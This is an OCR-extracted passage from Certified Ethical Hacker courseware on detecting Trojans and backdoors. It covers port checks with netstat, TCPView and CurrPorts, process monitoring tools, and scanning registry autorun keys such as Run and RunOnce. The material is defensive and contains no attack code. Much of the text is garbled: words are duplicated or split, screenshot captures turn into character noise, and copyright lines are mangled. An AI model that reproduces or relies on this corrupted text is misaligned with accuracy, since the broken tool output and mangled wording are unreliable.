NETWORK ACTI ACTIVITIE VITIES S 9. Scan Scan for susp suspicio icious us modifica modification tion to OPERATING OPERATING SYSTEM FILES FILES 10. Run Trojan SCANNER to detect Trojans Module 06 Page 948
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
S
Trojans open unused ports in victim mach ine to to connect back to Trojan Trojan handlers
B
Look Loo k for the connection established to unknown or suspicio suspicious us IP addresses addresses
C:\Windows\syste m32\cmd.exe
S i
x
J:\ Us er s\ Ad m irO ne ts ta t -an|
Ictive Connections Proto TCP TCP TCP TCP TCP TCP
Local Address 0.0.0.0:135 0.0.0.0:445 0.0.0.0:554 0.0.9.0:1025 0.0.0.0:1026 0.0.0.0:1027
t pp
n n 0 a: 10 9 ft
T CP CP
0 .0 .a.0:10243
T CP CP
127 .0.0.1:12080
T CP CP
127 .0.0.1:12000
TCP
127.0.0.1:12110
TCP TCP TCP TCP TCP TCP
State
LISTENING
L I S T E N IN IN G
LISTENING LISTENING
LISTENING
LISTENING I.IQTPNINH
0.0.0.0:1029 0.0.0.0:206? 0.0.0.0:5357
LISTENING
0.0.0.0:22350 127.0.0.1:12025
LISTENING LISTENING
LISTENING
LISTENING LISIENING
LISTENING ESTABLISHED
127.0.0.1:12080
LISTENING
<
> r 5 i 8 8 'J:rSIJ8 r S i 8 8 ' I : TS TS 88 88 8 J S A* 88 ' I :I S08H
:
a
0
□
System Administrator
ESTABLI SHED SHED
(nrin cN J S V 8 8 T:238 T:2382S 2S IS.V H'N 'I ‘2382 ‘23828 8 . _.fj
r iZ iZ lE lE MI MIH C KldBriZHE D E2IWBn 2HED ■Copyrif ;ht © by
EG-Gouncil. All Rights Jteservfed.;Reproduction Jteservfed.;Reproduction is Strictly
Prohibited.
Scann ing for fo r Suspicious Ports
Trojans open unused ports on the victim's machine to connect back to the Trojan handlers. These Trojans can be identified by scanning for suspicious ports. Scan for suspicious ports and look for the connection established to unknown or suspicious IP addresses. 31
C:\Windows\system32\cmd.exe
C: \ Users\ Adni n' net net stat - an Connect ect i ons ons Act i ue Conn Prot o TCP TCP I CP TCP TCP I CP I CP CP I CP I CP TCP TCP I CP TCP TCP I CP I CP I CP I CP I CP CP I CP CP TCP TCP
Local Address ddress 0. 0. 0. 0: 135 0. 0. 0. 0: 445 0. 0. 0. 0: 554 0. 0. 0. 0: 1025 0. 0. 0. 0. 0. 0: 0: 10 1026 0. 0. 0. 0: 102? 0. 0.0. 0:102 0:1028 0. 0. 0. 0: 1029 1029 0. 0. 0. 0: 2869 0. 0. 0. 0: 5357 5357 0. 0. 0. 0: 10243 0. 0. 0. 0: 22350 12? . 0. 0. 1: 12025 127. 0. 0. 1: 12080 127. 0. 0. 0. 0. 1: 1: 12 12080 127. 0. 0. 0. 0. 1: 1: 12 12080 127. 127. 0. 0. 1: 12110 12110
For ei gn gn Addr es s 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0. 0. 0: 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 0. 0. 0. 0: 0 127. 0. 0. 0. 0. 1: 1: 53 53850 127. 0. 0. 0. 0. 1: 1: 53 53852 0. 0. 0. 0: 0
St at e LI STEN STENI NG LI SI ENI NG LI STENI NG L I SI ENI NG LI STEN STENI NG LI SI ENI NG LI SI ENI NG LI SI ENI ENI NG LI SI ENI NG LI SI ENI ENI NG LI SI ENI NG LI STENI NG LI SI ENI NG LI STENI NG ESTABLI SH SHED ESTABL I SH SHED LI STENI NG
Type n e t s t a t
—a n
in command prompt
System Administrator
FIGURE 6.48: Scanning for Suspicious Ports
Module 06 Page 949
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Port Po rt M on itoring To Tool ols: s: TCPVi TCPView ew and CurrPo rt rtss CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer
TCPView is a Windows program that will show detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections
TCPView - Sysintemals: www.sysintemals.com
THO TH O
gr
Fie Opticns Piocesi View Hdp
-!ml-Pt
CurrPorts
| F*e Ed* V!cw Option? Hdp
x a i % V V -J S' « 0 3 t :;>*»<»Pfry:
0
TCP m tcp 772 tcp 772 TCP 772 TCP 772 TCP 772 TCP 77} TCP 773 TCP 773 TCP 773 TCP >1X0 TCP •3*0 cp 3576 TCP . t cp 1B7S TCP 876 TCP 3876 TCP 3676 TCP 31*6 TCP
€ c*« c*«cre»9
C c**re»« C !e
3668 644 S44 516
TCP TCP TCPV6 TCP
Rerwte 123.17S32U7 123.17S32U7 123.17 17S3?1<7 123.17 17532.133 123ITS 3?1 123.17 17632.15 153 f 13953 ISMf rt
LocdAddesi w>« winfm infm»W1.«M1 wnnv? »W1.«k41 wnm?«leMk41 wnmv«lf**k41 mv«lf** k41 m mw:lcMk4l wnmw*>*k4l
41^4« 1*
1
wp11MOInvl rp. N?> 123.175]?.14/ 75]? .14/ Ntp m/wVl1111• rf «V I Ntp miWl 111ft rr fi V I WINMSiELCf.4K (1 WWMSSEICMK 0 loedhotf 105? ! . fllhMf 1051 h3»HB91 HB91«IOO tapi r f.V I Ntpi m/vfl fl3116-«W* |p 11!’ mWUll&•(><.! I•... Ittpi
WlNWiOCir
WNMSSEICMK WNMr^imK
WNMr.nrK4K m1u l£kU41 m«m»*eUUk41 Mnfim-kV.4141 mn-imnlcMMI
un-fis -fi st* t*W W.
Remote Port Sm* N Nv aosc.w,»iT Nv
4262 3026 3026 102$
I... Itto WINMSSELCWK .0 whmewlck4k4 k4k41 0 WUJMSSELCMK 0
r?T*«jy-(rr» r - *n1 .rrr>
I »H4B. » H4B. •l-i !• tSHrtJ44D
11*11 L«SI€ I€H 1rg&
5 »4*^ <
EST«Mjy4(D
Proem N*
Procn. rocn... ..
Plot lotocol ocol Loca Local Por
local Po*... . .. Loca Local Add mi
♦ ♦ • « • ♦ ♦ ♦ • •
864 1940 1940 900 1375 BM 47• 1376 1040 1940 1940 900
UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP
it t kmp :5dp wi -di t co co... wi-dmo. wvdt oco... ■ptec• llmnr
Syjtcr• Syjtcr• $y««m Sytte Sytten n S> S>ll*m Sy*fT Sy*fT Syihm hm SjTMm Sytten Sytten Sytte Sytten n Sytlr Sytlrm m
• Sy Syitcm ♦ Syaem • Unknown known 0 Un Unknown ® Unknown ♦ Un Unknown C Unknown
t s t a n , 4 i :!:! [Siettjy-tfD
LlSIENIUi LISTEMI3. l«TEW\3
0
0 0 0 0
500 1900 3702 3702 3702 45C0 5355 51225 59293 $9294 62058 62060 49244 4924S 492S2 49253 49254
< Eflabfehe* 22 Listening: 28
53Total Ports, R&n ou Connections, 1Selected
[::]:500 [C111900 [::1:3702 [::]:3702 [::]:3702 [::]:4)00 [1:1:5355 [::]:5122S [l«d0!:b9M:d01.H [::1JS9294 [ ::]:62056 [::1:62060 10.00.12:49244 10.00.12:49245 10.00.12:492*2 10.00.12*9253 10.00.12*9254
Remote...
Remote ote _ A
80 ao ao 80 80
http http http http Wtp
*
> NirSott Proevyare. mtt »vrww.rur*ottn
http://technet.microsoft.com
http://www. ttp:// www.nirsoft. nirsoft.net
Copyright © by EG-CMMCil. All Rights ^pS'ervfed'.;Reproduction is Strictly Prohibited.
Port M onitoring Tools: Tools: TCPVie TCP View w and C urrP orts TCPView Source: http://technet.microsoft.com TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and the state of TCP connections. On Windows NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. It provides a more informative and conveniently presented subset of the Netstat program that is shipped with Windows. It works on Windows NT/2000/XP and Windows 98/ME. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions. On Windows XP systems, TCPView shows the name of the process that owns each endpoint. By default, TCPView is updated every second. Endpoints that change state from one update to the next are highlighted in yellow; those that are deleted are shown in red, and new endpoints are shown in green. The user can close established TCP/IP connections (those labeled with a state of ESTABLISHED) and save TCPView's output window to a file as well.
Module 06 Page 950
Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
\ JMft F il il e
Q
LJ O x I
TCPV iew - Sysinternals: www.sysinternals.com O pt pt io io n s
a
P ro ro c es es s
V ie ie w
H el el p
-< H
Process P ID ' [System Pro c... c... 0 fg chrome.exe 772 ch rome.exe 772 772 fg ch rome.exe 772 (• ch rome.exe ch rome.exe 772 (? ch ch rome.exe 772 ch rome.exe 772 chrome.exe 772 772 G ch rome.exe chrome.exe 772 3 380 g oo L^^Booaletdk exe 3688 googletalk.exe 3688 a “ l sass .ex e 644 I “ I sass exe 644 ” services.exe services.exe 636 ■ 1— ----------
t) f1t)) <
Endpoints: 69
P io l o c o l T CP T CP T CP T CP TCP T CP TCP T CP TC P T CP TC P T CP TC P T CP TC P T CP TCP T CP CP T CP CP TCP T CP CP T CP CP TCP T C PV 6 TCP
L o c a l Address w in msselck4k41 win-msselck4k41 W1rvmsselck4k41 win-msselck4k41 W1n-msselck4k41 win msselck4k41 w i n m s s e lc k 4 k 4 1 win-msselck4k41 win-msselck4k41 win-msselck4k41 W1n msselck4k41 W IN - M S S E L C K 4 K W l N -MS S E L C K 4 K .. W IN - M S S E L C K 4 K W l N -MS S E L C K 4 K .. win-msselck4k41 win*msselck4k41 win-msselck4k41 w in in -m -ms se se lc lc k4 k4 k4 k4 1 win-msselck4k41 win-m:; elck4k41 win-msselck4k41 W IN - M S S E L C K 4 K win-msselck4k41 WIN-MSSELCK4K
L o c a l Port 4277 4164 4250 4251 4252 4274 4275 4276 4278 4279 4280 12121 12122 1051 1052 1082 4033 4266 4271 1195 4281 4282 1028 1028 1029
=
V ]"<
III
E s t a b lis h e d : 22
«N
State Remote Address Remote Port 123.176.32.147 http T IM E W A I T 123.176.32.147 http ESTABLISHED 123.176.32.138 ht http E S T A B L IS H E D 123.176.32.138 http E S T A B L IS H E D 123.176.32.153 ht http E S T A B L IS H E D r-199-59-150-9. twt... ht http C L O S E W AI A IT v ip l 3 Ib40 lond. c o . .. http E S T A B L IS H E D v ip l 3. Ib40. lond. c o . .. ht http E S T A B L IS H E D 123.176.32.147 http E S T A B L IS H E D maa03s16-in-f27.1... http E S T A B L IS H E D maa03s16-in-f27 1... http E S T A B L IS H E D W l N -MS S E L C K 4 K . .. 0 L IS T E N IN G W I N - M S S E L C K 4 K .. . 0 L IS T E N IN G localhost 10 1052 E S T A B L IS H E D localhost 1051 E S T A B L IS H E D hg-in-f189.1e100.... ht https E S T A BL BL I S H ED ED maa03s16-in-f maa03s16-in-f22.1... https ESTABLISHED maa03s16-in f4.1e... ht https E S T A BL BL I S H ED ED maa03s16-in-f2.1 e .. ... https E S T A B LI LI S H ED ED ni in f125.1 e100. net 5222 E ST ST AB AB LI LI S HE HE D SYN SENT 74.125 236 189 http maa03s16-in f29.1, . http S Y N SE SE N T W I N •MS S E L C K 4 K . .. 0 L IS T E N IN G w in msselck 4k41 0 L IS T E N IN G W I N ■MS S E L C K 4 K . .. 0 L IS T E N IN G
L i s t e n in g : 28
T im im e W a aiit : 1
C lo s e W a aii t : 1
I FIGURE 6.49: 6.49: TCPView Tool Screenshot
CurrPorts Tool Source: http://www.nirsoft.net CurrPorts allows you to view a list of ports that are currently in use and the application that is using the ports. You can close a selected connection and also terminate the process using it, and export all or selected items to an HTML or text report. It displays the list of all currently opened TCP/IP and UDP ports on the system. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, etc.), the time that the process was created, and the user who created it. It allows you to close unwanted TCP connections, kill the process that opened the ports, and save the TCP/UDP ports information to HTML file, XML file, or tab-delimited text file. CurrPorts
& Fit•
Edit Vimw Oplioni
H iP
Proutt N«
PlOC« PlOC«..
Proto Protoco coll
Locj I Port
O System O System O System 0* System O System O System O Sy System O System O System ® System O System O System 0 Unknown O Unknown O Unknown ® Unknown Unknown
864 1940 1940 90 1376 864 476 1375 1940 1940 1940 9W 0 0 0
UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP
5C0 190: 3702 3702 3702 450: 5355 51225 59293 5929a 62056 6205C 4924a 49245 49252
0
TCP TCP
49253 4925a
53 Total Por t* I Remote Conneetions, 1 Seleeted
l c« c«*i Pc i. sakmp dp W5*SCO_ as
l oc oc 4l 4l Ad d' d' au
R*n1
[::1500 ]:: [:1900 [::>3702 [::>3702 [::>3702 [::>3702 [: :>4500 [: :>5355 [:: >53225 [f e80=b9ea: d01]:: <59294 [: :(62056 [:: >62060 10.0.0.1249244 80 10.0.0.1249245 60 1000 1249252 SO
R«mot •,•,.. A
_ _
-J sc o
•n-ifaca..
i psec-mdt Imnr
10.0.0 .0.0.1 .124 249253 1000124925a
60 SO
NxV.fl r>p.—
http ht tp ht t p http http
v 1
hMp-/'www.ni» » till .
FIGURE 6.50: CurrPorts Tool Screenshot
Module 06 Page 951
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scanning Sca nning for Suspicious Processes Trojans Trojans camouflage themselves as genuine Windows services or hide their processes to avoid detection
Process Process M onitor is a monitoring monitoring tool tool for Wind ow s that shows file system, registry, registry, and process/thread activity
UHU
Some Trojans use PEs (Portable Executable) to inject into various processes (such as explorer.exe or web browsers)
Processes are visible but looks like a legitimate processes and also helps bypass desktop firewalls
Process Monit or - Sysinternals: Sysinternals: vrww.sysinternals.com vrww.sysinternals.com £ile
L*
Edit
Event
Ll
P 0c«s3 Name 11:09: Explorer EXE Explow EXE ^ Explorer EXE^ 1:09:.. Explorer EXE*^ 11:09:.. jbc pk xw tXE ^ j Ewkxw.EXE* 11:09:.. • ctrx* tx ■ :09:.. cans .exe ^ : 09:.. ■ !cans.ece « e ■ : 09:.. c s n s « 11:09:.. csrss exe ” 1
: :.. :..
> ..
11 j j »_
Use process monitoring tools to detect hidden Trojans and backdoors
Filter
&
Troe
Trojans can also use rootkit methods to hide their processes
CEH
Tools
fiptions
V i ©
Help
I
I
£|a| ,,.l* .l *!
3ID Operation Path Resit 5572 ^Cr eateFi leMa... C:\Prcgram Hes *86)\N bz1ll8 hnefo SUCCESS 5572 rftRogOponKoy HKLM\Scftwaro\MIo HKLM\Scftwaro\MIo oooft\V/r »w SUCCESS' SUCCESS' 5572 RegGHjeiyValueHKLMvSOFTWAREWaoMft XMftn.. NAME NO 5572 StRegOcseKey HKLM\S0FTWARE\M1cro5of cro5of t\W n.. SUCC SUCCESS ESS 5572 CreateHie C:\Progran Hes X»6>\Nbz1lla hn to NAM NO 5572 ^ Qu ct y BasicInf.. .CAPregr APregraai Ties xDG)\Mjulla Ffcefo .. SUCCESS SUCCESS 548 &R #*d FI# C:\Window«\Syct* C:\Window«\Syct*m32\ m32\cxee cxee v dl SUCCESS SUCCESS 548 A Read Fie C :\Windows\System 32\csrs v dl SUCCESS 548 RegQueryYalusHKLM\S0 RegQueryYalusHKLM\S0 FTWARE\M1crosc FTWARE\M1crosc ft\Win. . SUCCESS 548 tjk ReadFie C:\Windows\Systefn32\sxs.dll SUCCESS 548 & ReadHe C:\W1ndows\System32 C:\W1ndows\System32\sxs.dll \sxs.dll SUCCESS >48 >48 rftRwQ ucrv Kcv HKLM SXCESS
Show ing 3S9,3T5 cf 662,305 events (54%)
Backed Backed by virtual mem ory
http://technet.microsoft.com Copyright © by
EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Scanning for Suspicious Suspicious P roce sses There are various symptoms that can indicate that our system has been infected. The system suddenly becomes slow, downloading speed becomes slow, and the Internet's speed also comes down drastically. Attackers use certain rootkit methods to make the Trojan hide in the system where it can't be normally detected by antivirus software. These Trojans and worms usually enter into the system through pictures, music files, videos, etc. that are downloaded into the system. Initially, everything seems to be good but slowly they show effect in various ways. By using process monitoring tools, we can easily detect hidden Trojans, worms, and backdoors. Hidden Trojans and other kinds of vulnerabilities or viruses can be detected by scanning for suspicious processes.
Pro cess M onito onitorr Source: http://technet.microsoft.com Process Monitor is a monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. It is used to analyze the behavior of spyware and dubious programs. Its features include rich and non-destructive filtering, comprehensive event
Module 06 Page 952
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, etc. Process Monitor Moni tor File
Time
11:09
<
Edit
Event
Filter
Process Name (Explorer.EXE _ ,Explorer.EXE Explorer .EXE ^(Explorer.EXE ,Explorer.EXE ,Explorer.EXE 1 Explorer.EXE ■ 'csrss.exe 'csrss.exe ■ 'csrss.exe 'csrss.exe ■ 'csrss.exe 'csrss.exe ■ 'csrss.exe 'csrss.exe ■ 'csrss.exe 'csrss.exe ■ ' csrss.ex csrss.exe e
Sysinternals: www.sysinternals.com Tools
Options
Help
PID Operation Operation Path Result 5572 5572 ykCrea ykC reateF teFil ileMa. eMa... .. C:\Program Files fc86 fc86)\M )\M0 0zilla Firefo... SUCCESS 5572 5572 rftRegOpe rftRe gOpenKey nKey HKL HKLM\S M\Softw oftware\M are\Microso icrosoft\W ft\Windo indow... w... SUCC SU CCES ESS S 5572 5572 4 % RegQueryValueHKLM\SOFTW RegQueryValueHKLM\SOFTWARE\Microsoft\Win.. ARE\Microsoft\Win.... NAME NO 5672 5672 ^R eg Q os eK ey HKLM\ HKLM\SOF SOFT\VA T\VARE\M RE\Micro icrosoft\ soft\Win. Win... .. SUC CESS CES S 5572 5572 [^C [^ C reat re ate e File C:\Program Files fc86 fc86)\ )\M M0 zilla Firefo... NAME NO 5572 ykQuef> Basiclnf ..C:\Program Files fc86 fc86)\M )\M0 0zilla Firefo... SUCCESS 548 2 ^ Read File C:\WrKJcws\ C:\WrKJcws\Systern32 Systern32\sxssrv.dll \sxssrv.dll SU CC ESS ES S 548 ^ Read File C:\Windows C:\Windows\System \System32\c 32\csrsrv.dll srsrv.dll SU CC ESS ES S 548 & RegQueryValue egQueryValue HKLMXSO FTWAR FT WAR E\Microsoft\Win... E\Microsoft\Win... SUCC SU CCES ESS S 548 548 Read File C:\Windows\System C:\Windows\Sys tem32\sx 32\sxs s dll SU CC ES S 548 548 Read File C:\Windows\System32\sxs.dll C:\Windows\System32\sxs.dll SU C CE SS 548 rftReaQuer rftRe aQuervKev vKev HKLM SUCCESS _____________
III
Showing 359,375 of 652,305 events (54%)
>
Backed by virtual memory
FIGUR FIGURE E 6.51: 6.51: Pr oce ss Monitor
Module 06 Page 953
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
P roc ess M onitoring To Tool: W hat's Running J
e
Wh at's Running gives gives an inside look into your W in do ws operating systems
C EH
Microsoft
Inspect the processes processes and get performance and resource usage data such as memory usage, processor usage, and handles
e
Information about dlls loaded, services running within the process, and IPconnections associated with processes
Copyright 6 by EG-GtUIIC EG-GtUIICil. il. All Rights Reserved. Reproduction is Strictly Prohibited
Pro ce ss M onitoring Tool Tool:: W hat’s hat’s R unn ing ^
Source: http://www.whatsrunning.net
What's Running gives you an inside look into your Windows system, such as 2000/XP/2003/Vista/Windows7. It explores processes, services, modules, IP-connections, drivers, etc. through a simple-to-use application. 9
It inspects the processes and gives performance and resource usage data such as memory usage, processor usage, and handles. It gives all the details about dll:s that are loaded, services that are running within the process, and the IP-connections each process has
0
IP connections:
Processes:
It gives all the active IP connections in your system
Q S e r v i c e s : Inspects the services that are running and stopped Q
Modules:
Finds out the information about all dll:s and exe:s that are in use on your
system
Module 06 Page 954
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Drivers: It finds out the information about all drivers, for running drivers you can inspect
the file version for finding the supplier of the drive System information: It shows crucial system information about your system such as
installed memory, processor, registered user, and operating system and its version —
What’s Running? 3.0 File
View
Startup
Help Processes 79 |
Snapshot
Q $ ake snapshot t j Load Snapshot from file
Compare snap with sa... © Upload Upload Snapshot Snapshot to ...
_
Processes
X
Start Process o
|□
Stop process
3 Select Process column columns View delta Icons Get nfo onlne & Open folder
, J- ihow processe processess in Tree Tree
A rs -
Ser Service vices s ■1701 1701Gl Modies349 | ^
Process Name Proces. User Name lsass.exe 616 SYSTEM wtnlogon.exe 564 SYSTEM dwm.exe 868 J explorer. rer.ex exe 600 Administrator igfxtray.exe 3908 Administrator hkcmd.exe 3936 Administrator igfxpers exe 4028 Admintstrator ! {f {f t edpr_server.exe 3140 Administrator 2224 Administrator Q WinFLTray.exe M FLComServDrl.exe 1036 Administrator J Snagit3 git32e 2exe xe 1396 Administrator TscHelp.exe 3268 Administrator SnagPriv.exe 3532 Administrator CSnagitEdrtor exe 4120 Admmstrator 4324 Admmstrator splwow64.e. U hrefox exe 4420 Admmstrator 4304 Admmstrator P j P0WERPNT.EXE P0WERPNT.EXE 4200 Administrator S mmc.exe vmconnect.exe 3372 Admristrator 3304 Administrator googletalk exe !rt| !rt| EME EMET_ T_notifi f ier e r exe 3404 Admintstrator © chrome exe 4708 Administrator w•:. ;1 ■■: - •:-,:i ^^ ^ ^ ■ ! 4872 Admintstrator chrome.exe chrome.exe 2700 Admmstrator ^ chrome.exe 5096 Admmstrator ^ chrome.exe 3600 Admmstrator (£ ) chrome.exe 2580 Admmstrator £ ) chrome.exe 2240 Admintstrator
1^1
CPU 0.0 0.0 * 0.0 0.0 00 00 00 00 00 * 00 * 00 00 * 00 00 00 00 00 00 m n * 00 0.0
IP Connections ■37 | * * Driver vers• 279 | Q Startup-16 |
Prod Prod KA ► ► ► 1 1 1 E F F c c c
► F ► ► ► C E C = C c c c 0.0 c 0.0 o
Item 3 Proc Proces ess s Properties es Process ID Process Name Parent Process ID CPU Target ® Process Process 0 Memory Page Fault Count Peak Working Set,. Working Set Size Quota Peak Page,.. Quota Paged Pool... Quota Peak Non . Quota NonPaged... Page Fie Usage Peak Page File Us... ® FileVersion 0 Time me Creation Time Kernel Time User Time
@I/O
System Info |
4856 chrome.exe 4708 0.0 Win32
58907 45948 K 37900 K 232 K 225 K 25 K 25 K 32364 K 37436 K
10/2/2012 5:4203 PM 00:00:00:390 00:00:03:853
(3 Ul Objects
,1 ^ Services Service s (0) B [ T Modules(46)
Update interval:! seconds
FIGURE 6.52: 6.52: What 's Running Running Tool Tool Screenshot
Module 06 Page 955
Ethical Hacking and Countermeasures Copyright © by EC C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
P roce ro cess ss M onitoring on itoring Tools p
PrcView
i
http:/ :/'/www.teamcti.i.com
%
Winsonar
£•9
CEH
Secur ity Task Task Manager M anager
http://www.neuber.com
^
M
Yet Another (remote) Process Process Monitor
C
http://www.fewbyte.com
4)
HiddenFinder HiddenF inder
MONIT
http://www.wenpoint. t.com
http://mmonit.com
Autoruns for Wind ow s
Process Monitor M onitor
http://technet.microsoft.com
b F3
http://yaprocmon.sourceforge. e.net
http://technet.microsoft.com
KillProcess
OpManager
http://orangelampsoftware.com
http://www.manageengine.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduc tion Is Strictly Prohibited.
Pro cess M onitoring onit oring Tool To olss There are many process monitoring tools that you can use for the detection of Trojans installed on your system. These tools display a list of all the processes running or installed on your system. By analyzing the list you can identify the Trojans. These tools provide a comprehensive monitoring console for your entire network and IT infrastructure. They continuously and proactively monitor the entire IT system because of which any outages or performance degradations can be immediately identified and notified. In addition, it kills all the software that threatenss your computer, even if it is hidden. A few process monitoring tools are listed as follows: 9
PrcView available at http://www.teamcti.com
9
Winsonar available available at http://www.fewbvte.com
9
HiddenFinder available at http://www.wenpoint.com
9
Autoruns for Windows available at http://technet.microsoft.com
9
KillProcess available at http://orangelampsoftware.com
9
Security Task Manager available at http://www.neuber.com
9
Yet Another (remote) Process Process Monito r available at http://yaprocmon.sourceforge.net
9
MONIT available at http://mmonit.com
9
Process Monitor available at http://technet.microsoft.com
9
OpManager available at http://www.manageengine.com
Module 06 Page 956
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scan ning for Suspicious Fnivtac J
Windows automatically executes executes instructions in
e Run
e
Findsregis istry ryerrors, unneededregis istry ryjunk andhelpsin indetectingre registryentrie iescreated byTroja jans
RunSe unSerr vi ces
e RunOnce e RunSer unSer vi cesOnce cesOnce S HKE HKEY_CLA Y_CLASSE SSES_RO S_ROOT\ exef i l e\ shel l \ open\ open\ command
| N*ordrKteryX:C:«Vnd»w1\ir«trf rf»\{A {ACXa NRU81 >otherhat C:'LMer5\AJmr1SrabrOedctooVrtfoi Setui IS O.1j NRUattKr)1at1C^I>e»VUmraM>ak»«aktopr«t«o>Sc«w>IS C1. NRUantio thertat therta t E:Vfepfcatont'Asctcason'f reb*Set«9.0.1re 1re NIKI trti ottw tat ta t F•\Aeptr»tnwVksplr»tar*' nwVksplr»tar*'FrH»» # 1re
"%1" %*. sections of registry J
Scanning registry values for suspicious entries may indicate the Trojan infection
J
Trojans insert instructions at these sections of registry to perform
http:// www.macecraft www.macecraft .com
malicious activities
Cbpyright © by EC-CMBCil. All RightsJte$e rvei;R eprod uctio n is Strictly Prohibited.
^23
Scann ing for Suspicious R eg istry istry En tries tries
— When Wh en a Trojan gets gets installed on on the victim's machine, it generates genera tes a registry regis try entry. entry . We can notice various changes; the first symptom is the system gets slower. Various advertisements keep popping up. So, scanning suspicious registries will help in detecting Trojans. Windows automatically executes instructions in the following sections of the registry:
© Run 9
RunS unSer vi ces
© RunOnce 9
Run RunSe Serr vi cesOnce cesOnce
Q HKEY_CLAS HKEY_CLASSES SES_ _ ROOT\ exef i l e\ s hel l \ open\ command " %1" % * Scanning registry values for suspicious entries may indicate a Trojan infection. Trojans insert instructions at these sections of the registry to perform malicious activities.
r |Jj k
jvl6 PowerTool PowerToolss 2012 012 -Registry Cleaner Source: http://www.macecraft.com
jvl6 jvl 6 Powe PowerT rToo ools ls 2012 is the ultima ultimate te regis registry try cleaner cleaner used to find registry registry errors and and unneeded registry junk and helps in detecting registry entries created by Trojans.
Module 06 Page 957
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Trojans and Backdoors
Exam 312-5 312-50 0 Certified Ethical Hacker
jv16 PowerTools 2012 [W8-x 64] - Registry Cleaner Fte Fte
Select
Iools
Key Entry’s name
Help HKCRV-ocal Settings^oftwareWicrcsoft\W1ndows\ShelV*mCa:he\ D: \CEH T:>0ls\Sal tyBee. Exe. Friendly AppName
Value
SaltyBee
Entry last modified
01.10.2012,05:02
Error seventy
25
Error descrip bon
MRU and other history data
Fie reference
D:\CEH-T30lsV5altyBee.Exe
ReasDn for detection Invalid file refer ence Tags Key /
Entry's name
Entry last modified Errcr severity
Value
Error desenpton
□ Q I n v a l i d f ile or d ir e c t o r y r e f e r e n c e □ HCCR\ ®
71 —
C:\Wi1 dows\Installer tallerYJAC76BA8 YJAC76BA820.09.2012, 07 :%
Fie or drectory C: C:\Wmdows\Installer',{AC76BA86-7AD7-1033-7B44-A95000000001>\XFDFFieJ
□ HtCR\ E:\Applicali Applicali0ns Intel_mul6-
NRU and other htst
□ HKG^C:VJsers\Admir Firefox
MRU and other hist( C:\Users\Administratorpesktop^i \Administratorpesktop^irefox refox Setup 15.0. 15.0. l.exe
01.10.2012, 01.10.2012, 05:02
MRU and other hist( C:VJsers\Administratorpesktop^iref 6x Setup 15.0. l.exe
□ HKCR^C: VJsers\Admir Mozilla
01.10.2012, 05:02
□ «< ? E:\Applications Firefox
01.10.2012, 05:02
25%
MRU and other hist« E:\Applications \AppliationsV=iref 6x Setup 9.0. Lexe
□ HKCR^E:\Applications Mozilla
01.10.2012, 05:02
25%
MRU and other hish E:\Appiications \Applications^irefox Setup 9.0. Lexe
□ HKCR^C:\Program \Program File File Atelie Atelie Web Re mote Commander 01.10.2012, 05:02
25%
MRU and other hist( CiV^ogram CiV^ogr am Files (x 86)\Atelier Web Remote Commander Pro\awrcp.exe
□ HKCR^ C: \Program FileAtelieW eb Software
25%
MRU and other hist( CrV^ogram Files (x 86)\Atelier WebV^emote Commander Pro\awrcp.exe
01.10.2012, 05:02
I KC R^ D:\CEH-Tools\S SaltyBee
01.10.2012,05:02 | other Ns& C: YJsers \Adm \Admm1stra tor downloa ds V.ostD00r_v 6\SaltyBee.Exe
□ HKCR\C:\Users\A HKCR\C:\Users\Admir dmirSaltyBee
01.10.2012, 01.10.2012, 05:02
25%
MRU and
